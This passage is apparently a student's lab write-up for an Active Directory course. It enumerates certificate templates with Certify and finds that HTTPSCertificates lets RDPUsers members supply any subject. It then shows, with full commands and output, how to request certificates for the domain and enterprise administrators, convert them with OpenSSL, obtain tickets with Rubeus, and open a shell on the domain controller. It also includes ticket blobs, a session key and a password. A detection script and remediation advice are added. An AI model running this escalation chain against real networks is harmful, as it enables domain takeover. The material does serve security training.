NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
AutoEnrollment Rights : mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID,
SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
AutoEnrollment Rights : mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS,
SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server
Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server
Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
AutoEnrollment Rights : mcorp\Domain Controllers S-1-5-21-335606122-960912869-
3279953914-516
mcorp\Enterprise Read-only Domain Controllers S-1-5-21-
335606122-960912869-3279953914-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS S-1-5-9
Object Control Permissions
Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-
3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Users
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 1
Application Policies : Certificate Request Agent
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-719815819-
3726368948-3917688648-513
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-
3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : CA-Integration
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS,
AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-
3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
Object Control Permissions
Owner : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519
WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-
3279953914-500
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

Certify completed in 00:00:21.0017301

From the output we can clearly see that the HTTPSCertificates template has the setting "Enrollee supplies
subject" (ENROLLEE_SUPPLIES_SUBJECT) on it, and that its EKU includes Client Authentication, so a
certificate issued from it can be used for logon. Other templates have the same name flag, but the
difference is the enrollment rights: the group dcorp\RDPUsers has enrollment rights on HTTPSCertificates,
so any member of that group can request a certificate for any user, including domain admins or enterprise
admins. Since our student user is a member of RDPUsers, we can abuse this.
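The triage above is done by eye over a long Certify listing. The following script is an added example (not part of the original notes or of Certify) that parses Certify's `find` output in the layout shown above and applies the same reasoning automatically: enrollee supplies the subject, no manager approval (Certify prints `PEND_ALL_REQUESTS` in `mspki-enrollment-flag` when it is required), no co-signatures required, an EKU that permits client authentication (or no EKU at all), and an enrollment principal that is not one of the built-in administrative or domain-controller identities. The sample input is a constructed excerpt of three templates from the listing above; the wrapped SID lines are deliberately kept so the parser handles the real output layout.

```python
"""Triage Certify 'find' output for templates where a low-privileged principal
can enroll and choose the certificate's subject/SAN.  Added example, not
Certify's own code; key and flag names are those Certify prints."""
import re
from typing import Dict, List, Tuple

# Constructed excerpt in the layout of the Certify output above (WebServer,
# SubCA, HTTPSCertificates); wrapped SID lines kept on purpose.
SAMPLE = r"""
CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : WebServer
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
mcorp\Enterprise Admins S-1-5-21-335606122-960912869-
3279953914-519

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SubCA
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
Permissions
Enrollment Permissions
Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : HTTPSCertificates
msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure
Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-
3726368948-3917688648-1123
mcorp\Domain Admins S-1-5-21-335606122-960912869-
3279953914-512
"""

SECTION_HEADERS = {"Permissions", "Enrollment Permissions",
                   "Object Control Permissions"}
PRINCIPAL_RE = re.compile(r"(.+?\\.+?)\s*(S-1-5-[\d-]*\d)")
# Well-known RIDs whose enrollment is expected: Administrator (500), Domain
# Admins (512), Domain Controllers (516), Enterprise Admins (519), Enterprise
# RODCs (498); S-1-5-9 is NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS.
PRIVILEGED_RIDS = ("-500", "-512", "-516", "-519", "-498")
PRIVILEGED_SIDS = {"S-1-5-9"}
# EKUs that make a certificate usable for domain logon.
CLIENT_AUTH_EKUS = {"Client Authentication", "Smart Card Logon",
                    "PKINIT Client Authentication", "Any Purpose"}


def parse_templates(text: str) -> List[Dict[str, str]]:
    """One dict per template.  Lines without ' : ' continue the previous value;
    a value ending in '-' was wrapped mid-SID, so it is joined without a space."""
    templates: List[Dict[str, str]] = []
    current, last_key = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS:
            continue
        if " : " in line:
            key, value = (p.strip() for p in line.split(" : ", 1))
            if key == "CA Name":          # every template block starts here
                current = {}
                templates.append(current)
            if current is None:
                continue
            current[key] = value
            last_key = key
        elif current is not None and last_key is not None:
            sep = "" if current[last_key].endswith("-") else " "
            current[last_key] += sep + line
    return templates


def enrollment_principals(t: Dict[str, str]) -> List[Tuple[str, str]]:
    """(name, SID) pairs from the joined 'Enrollment Rights' value."""
    return [(n.strip(), s) for n, s in PRINCIPAL_RE.findall(t.get("Enrollment Rights", ""))]


def is_privileged(sid: str) -> bool:
    return sid in PRIVILEGED_SIDS or sid.endswith(PRIVILEGED_RIDS)


def esc1_findings(text: str) -> Dict[str, List[str]]:
    """Template name -> low-privileged principals that can enroll, for templates
    where the enrollee supplies the subject, no approval/co-signature is needed
    and the EKU allows client authentication (or is unrestricted)."""
    findings: Dict[str, List[str]] = {}
    for t in parse_templates(text):
        ekus = {e.strip() for e in t.get("pkiextendedkeyusage", "").split(",")}
        if "ENROLLEE_SUPPLIES_SUBJECT" not in t.get("msPKI-Certificates-Name-Flag", ""):
            continue
        if "PEND_ALL_REQUESTS" in t.get("mspki-enrollment-flag", ""):  # manager approval
            continue
        if t.get("Authorized Signatures Required", "0") != "0":
            continue
        if "<null>" not in ekus and not (ekus & CLIENT_AUTH_EKUS):
            continue
        low = [n for n, s in enrollment_principals(t) if not is_privileged(s)]
        if low:
            findings[t["Template Name"]] = low
    return findings


if __name__ == "__main__":
    for name, who in esc1_findings(SAMPLE).items():
        print(f"{name}: enrollable by {', '.join(who)}")
```

Run against the three-template sample it reports only HTTPSCertificates, enrollable by dcorp\RDPUsers: WebServer and SubCA also let the enrollee supply the subject, but only Domain Admins and Enterprise Admins can enroll in them, which is exactly the distinction the paragraph above draws. Feed it the full `certify.exe find` output to review every template the same way; the fix for a flagged template is to clear ENROLLEE_SUPPLIES_SUBJECT, require manager approval, or remove the broad enrollment ACE.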

Escalation to Domain Administrator


We will request a certificate for the Domain Administrator. Once we have the certificate, we will use it to
request a TGT.

Requesting a certificate
C:\Windows\system32>C:\AD\Tools\certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-
DC-CA /template:HTTPSCertificates /altname:administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : dcorp\student163


[*] No subject name specified, using current context as subject.

[*] Template : HTTPSCertificates


[*] Subject : CN=student163, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : administrator

[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response : The certificate had been issued.


[*] Request ID : 28

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----

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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic
Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:15.6708451

Now we copy the certificate output into a Notepad file and save it as cert.pem. With OpenSSL we can convert
the PEM file to a PFX file.
C:\Windows\system32>C:\AD\Tools\openssl\openssl.exe pkcs12 -in
"C:\Users\student163\Desktop\cert.pem" -keyex -CSP "Microsoft Enhanced Cryptographic Provider
v1.0" -export -out C:\Users\student163\Desktop\certificate.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Request a TGT
With Rubeus and the certificate file we can request a TGT.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:administrator
/certificate:"C:\Users\student163\Desktop\certificate.pfx" /password:P@ssw0rd /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student163, CN=Users, DC=dollarcorp,
DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/5/2024 2:45:06 AM
EndTime : 7/5/2024 12:45:06 PM
RenewTill : 7/12/2024 2:45:06 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : JPScBaNzUmr9vmPaiaowNA==
ASREP (key) : 425691A06BD22882B41A611B57E67948

C:\Windows\system32>klist
Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 7/5/2024 2:45:06 (local)
End Time: 7/5/2024 12:45:06 (local)
Renew Time: 7/12/2024 2:45:06 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd.exe


Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

Escalation to Enterprise Administrator


We can use the same method to escalate our privileges to Enterprise Administrator.

Request a certificate
C:\Windows\system32>C:\AD\Tools\certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-
DC-CA /template:HTTPSCertificates /altname:moneycorp.local\administrator

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Request a Certificates

[*] Current user context : dcorp\student163


[*] No subject name specified, using current context as subject.

[*] Template : HTTPSCertificates


[*] Subject : CN=student163, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : moneycorp.local\administrator

[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA


[*] CA Response : The certificate had been issued.
[*] Request ID : 33

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----

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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic
Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:15.1168120

Again we copy the certificate output into a Notepad file and save it as cert-EA.pem. With OpenSSL we can
convert the PEM file to a PFX file.
C:\Windows\system32>C:\AD\Tools\openssl\openssl.exe pkcs12 -in "C:\Users\student163\Desktop\cert-
EA.pem" -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out
C:\Users\student163\Desktop\certificate-EA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Request a TGT
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /dc:mcorp-
dc.moneycorp.local /certificate:"C:\Users\student163\Desktop\certificate-EA.pfx"
/password:P@ssw0rd /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=student163, CN=Users, DC=dollarcorp,
DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator'
[*] Using domain controller: 172.16.1.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGhjCCBoKgAwIBBaEDAgEWooIFjTCCBYlhggWFMIIFgaADAgEFoREbD01PTkVZQ09SUC5MT0NBTKIk
MCKgAwIBAqEbMBkbBmtyYnRndBsPbW9uZXljb3JwLmxvY2Fso4IFPzCCBTugAwIBEqEDAgECooIFLQSC
BSmXvuoNEsy8SEmW2/XqK7k3bgM67flnDO9ip9ut8aNZCSyXlJQ5pOAN/qrzA4scqLqS7j8+WIAz38SU
xYnKZTXJrgZkT8gB3pcbKvA2XP01rBb1tDHGcs/0ZdhrysunfaYWLmHDYcpXl44AmOhkcPbo8eWsHfKm
GBDXUROgYO5l2Wi6XRGLam35TQobllAtskBnl0OgMVUhR4w6zXsdxKVX/8xtBOJgBJV87k7cHTe30eVe
to0oszD08/W7fWqInRBs8kFWrMRAQoVBvebbGqepHlx+Ry0wP8jJKBbKi26cC2YDscPpYR6pXVchFGyu
GZTmgQrx4VUDAgkAFFRZTUCptYtjlGfWNU+wTt8A16thDuaxg7oFpj/0Uw2uuX3TcFOPbLz0ENYaPRMG
hhGCljk1/aVkWwxd9vupAa6NpBcaJMbXc+91KitB+1M9xXKzjMZO1dWXyMSjHJWIQt7L1dGtIkDlSPPP
Wh5eZFOnRk29rU2I4n+z5a2fxV01BcmmKxXF6MLAwRF/vtqlBw8Em4ltECowNnNAUqkl5py8kGPIJmBR
23L2VpOkZ0nccZedVVbEa/Grtk/ehwbcM6XkHXfOaFlX2T3VyVyxaepghJP2hhe0DqZke2CgtG/OyEyd
FjhYO25amIX6GdtgHmCcRerCY6bgp95aE2Maf3R46BKbzoKzb3HtQ50tvjblpOshA7BzZTZ3TF3OR1BW
I6mKjfMSkE2O2+7sgWpFsHq5vq/3murXksaW5REAuuDoJX5RqNyHVGn9+ajyWgTVLMU3xIjUftwzQvAC
Z1KfuTLjAnMRty3PDccQ6rG5fwkf3GizPOTo71D/KMD5+gjWuzzgrqLlB9lYFHkPy2a7O0C0+SIfBmz+
m29DMJEHJto5OQfETvt3G0SeTcxS13inFAkBGapc4/6whmynlj+bWIFr1fWBPiC03hsIJZ0NYf40tzhd
